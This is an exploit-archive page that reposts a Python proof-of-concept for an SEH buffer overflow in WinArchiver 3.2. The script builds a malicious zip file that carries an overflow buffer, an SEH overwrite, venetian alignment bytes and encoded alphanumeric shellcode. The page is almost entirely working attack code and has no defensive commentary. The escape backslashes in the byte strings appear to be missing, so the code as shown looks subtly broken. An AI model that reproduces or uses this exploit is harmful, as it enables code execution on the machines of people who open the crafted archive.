Home / exploits

PDF

Winarchiver 3.2 Buffer Overflow

Posted on 04 May 2013

#/usr/bin/python
# Exploit Title: Winarchiver V 3.2 SEH Overflow
# Date: April 24, 2013
# Exploit Author: Josep Pi Rodriguez, Pedro Guillen Nunez , Miguel Angel de Castro Simon
# Organization: RealPentesting
# Vendor Homepage: http://winarchiver.com
# Software Link: http://www.winarchiver.com/WinArchiver3.exe
# Version: 3.2
# Tested on: Windows XP SP3
zip_header = (
"x50x4Bx03x04x0Ax00x04x02x00x00xE5x18xE9x3ExCCxD4"
"x7Cx56x0Fx00x00x00x0Fx00x00x00x08x00x00x00x54x65"
"x73x74x2Ex74x78x74x54x68x69x73x20x69x73x20x61x20"
"x74x65x73x74x21x50x4Bx01x02x14x00x0Ax00x40x00x00"
"x00xE5x18xE9x3ExCCxD4x7Cx56x0Fx00x00x00x0Fx00x00"
"x00xBEx20x00x00x00x00x00x00x01x00x3DxACxBDx04x00"
"x00x00x00"
)
zip_final=(
"x50x4Bx05x06x00x00x00x00x01x00x01x00xECx20x00"
"x00x35x00x00x00x00x00"
)
seh = "x31x48" #ppr 0x00480031
nextseh = "x58x70"
venetian = (
"x55x55"
"x70"
"x58"
"x70"
"x05x25x11"
"x55"
"x2dx19x11"
"x55"
"x50"
"x55"
"xc7"
)
shellcode = (
"PPYAIAIAIAIAQATAXAZAPA3QADAZABARALAYAIAQAIAQAPA5AAAPAZ1AI1AIAIAJ11AIAIAXA58AAPAZABABQI1"
"AIQIAIQI1111AIAJQI1AYAZBABABABAB30APB944JBKLJHDIM0KPM030SYK5P18RQTDK1BNPDK0RLLTKB2MDDKS"
"BO8LO870JMVNQKOP1I0VLOLQQCLLBNLO091HOLMKQ7WZBL0220W4KQBLPTKOROLKQZ0TKOPRX55WPRTPJKQXP0P"
"TKOXLXDKQHO0M1J39SOLQ9DKNT4KM1Z601KONQGPFLGQXOLMM197NXIP2UZTLC3MJXOKCMND2UZBPXTK1HO4KQJ"
"3QVDKLLPKTKB8MLKQJ3TKM4TKKQZ04IOTMTMTQK1KQQQI1JPQKOK0PX1OQJ4KLRJKSVQM1XNSNRM0KPBHD7T3P2"
"QOR4QXPL2WO6KWKOHUVXDPKQKPKPNIGTQDPPS8MYU0RKM0KOZ5PPPP20PPQ0PPOPPPQXYZLO9OK0KOYEU9Y7NQY"
"K0SQXKRM0LQ1L3YJFQZLPQFR7QX7RIK07QWKOJ5PSPWS86WIYNXKOKOXUR3R3R7QXD4JLOKYQKOJ5B73YHGBH45"
"2NPM31KOXUQXC3RMC4M0CYYS1GQGR701ZV2JLRR90VK2KMQVY7OTMTOLKQM1TMOTMTN0I6KPPD1DPPQF261FQ6B"
"60N26R6PSR6RHRYHLOODFKOIE3YYPPNPVOVKONP38KXTGMM1PKOJ5WKJP6UERB6QX6FTUWMUMKOZ5OLM6SLLJ3P"
"KKK045M5WKQ7N3RRRORJM0QCKOHUA"
)
buffer = "x41" * (205+216) + shellcode + "x41" * (2000-216-len(shellcode)) + nextseh + seh + venetian + "x42" * (6173-len(venetian))
print len(buffer)
payload = buffer
mefile = open('seh_winarch.zip','w')
mefile.write(zip_header + buffer + zip_final)
mefile.close()

 

TOP